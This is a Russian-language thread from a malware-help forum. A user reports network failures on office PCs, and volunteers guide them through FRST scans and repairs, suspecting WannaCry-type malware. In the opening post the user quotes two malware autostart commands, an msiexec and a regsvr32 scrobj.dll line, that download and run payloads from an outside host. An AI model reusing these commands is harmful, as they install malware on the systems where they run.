Пропала сеть на 4 компьютерах, но интернет по этому же кабелю раздается нормально.
Проверка настроек ни к чему не привела, сети так и нет. С одного раздающего интернет компьютера видно все компы, но другие его не видят. пинг нормальный без потерь во все стороны.
В автозагрузке появились пункты "msiexec.exe /i http://js.mykings.top:280/helloworld.msi/q" и "regsvr32 /u/s/i:http://js.mykings.top:280/v.sct scrobj.dll", отключение не помогло.
ттак же др.веб поймал mssecsvc.exe и 3165616.exe.
Еще появился файл hosts.ics, удаление его не помогает, после перезагрузки он снова появляется.
Также есть еще одна сеть на 8 компов, с такими же симптомами.
Настройки сети тыщу раз перепроверялись но бестолку. Антивирус Др.Веб и MBAM ничего больше не находят.
Думаю вирус. помогите пожалуйста!
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Волокитин, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Кроме уже установленных, отметьте галочками также "90 Days Files".
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (можно все в одном архиве).
Вот результаты, надеюсь это поможет. А то в сети односторонняя связь, проблемный комп видит всех, а его то не видят, то нет доступа. Перенастройка сети не помогает. Остается надеяться, что это результат работы вируса, и вы поможете мне с ним справиться
Сохраните (Ctrl+S) и закройте. Отключите до перезагрузки антивирус, в FRST нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
После выполнения FRST -> fix, в Сети стали отображаться только устройства мультимедиа, но принтер который работал по сети и был подключен к проблемному компу теперь печатает по сети без проблем. Другие компьютеры также не видят этот проблемный комп через "мой компьютер"-> "сеть", если набрать а адресной строке адреса компьютеров типа \\192.168.137.1 ...... 4 то сеть открывается.
Уже радует что принтер заработал о сети. спасибо! посоветуйте что сделать чтобы открывалась сеть через мой компьютер.
- - - - -Добавлено - - - - -
Так что же это было, вирус,его последствия?
Есть еще одна сеть на 8 компьютеров, там такая же проблема. Раздающий комп видит всё, а его никто не видит. Мне создать новую тему и в ней прикреплять логи, или это можно исправить руками?
Боюсь, сперва придётся вирус и его последствия устранять и на других. И в отдельных темах.
Скачайте Windows Repair (All In One), распакуйте, запустите, закладка "Repairs", "Open Repairs", отметьте пункты: 13 "Repair network" 26 "Restore Important Windows Services" 27 "Set Windows Services To Default Startup"
и нажмите "Start Repairs".
winows repair еще не пробовал, чет боюсь что сбросится все и опять работать не будет. Можно ли отменить изменения сделанные windows repair?
В принципе в этой сети нужен только интернет и принтер сетевой, доступ к другим компьютерам не используется, можно и в ручном режиме прописывать адрес и заходить на другой комп.
Отменить изменения в windows repair можно, по умолчанию утилита предлагает бэкап реестра.
Но сперва ознакомьтесь со рекомендациями и выполните их в обязательном порядке для всех компьютеров, весьма вероятно, что в сети атакует WannaCry или другой зловред, использующий ту же уязвимость.
Неделю все работало хорошо. Правда windows repair я так и не запускал, главное принтер работает и все рады. Сегодня опять пропал принтер сетевой. Повторил опять скрипт в frst и принтер вернулся. Может быть в логе будет видно какая зараза опять активизировалась.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
Вот результат проверки. сегодня принтер работает нормально. а файл hosts.ics пересоздается при каждом запуске системы, незнаю влияет ли он на работу сети
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: